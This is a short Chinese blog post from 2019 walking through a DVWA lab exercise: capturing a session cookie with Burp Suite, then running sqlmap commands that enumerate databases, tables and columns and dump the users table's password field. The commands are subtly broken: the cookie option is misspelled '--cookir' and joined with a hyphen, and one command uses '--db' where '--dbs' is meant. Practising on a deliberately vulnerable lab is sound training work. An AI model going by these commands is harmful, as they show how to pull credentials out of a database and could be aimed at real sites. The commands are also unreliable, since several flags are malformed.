Qing

SQLMAP 盲注
浏览器/sqlmap/BurSuite打开进入DVWA设置难度等级为中级点SQL Injection打开Bur S...
扫描右侧二维码阅读全文
05
2019/03

SQLMAP 盲注

浏览器/sqlmap/BurSuite

打开进入DVWA

设置难度等级为中级

点SQL Injection

打开Bur Suite开始抓包

抓到有cookie为止

复制url和cookie

输入命令sqlmap -u "url" --cookir="cookir" --db


sqlmap -u "url" --cookir-"cookie" --dbs #获取所有数据库
sqlmap -u "url" --cookir-"cookie" -D dvwa --tables #获取所有表
sqlmap -u "url" --cookir-"cookie" -D dvwa -T users --columns #获取所有字段
sqlmap -u "url" --cookir-"cookie" -D dvwa -T users -C password --dump #获取字段的值

  • -D #后跟数据库
  • -T #后跟表名
  • -C #后跟字段名
  • --dbs #获取所有数据库
  • --tables #获取所有表
  • --columns #获取所有字段
  • --dump获取值

最后修改:2019 年 04 月 06 日 02 : 34 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论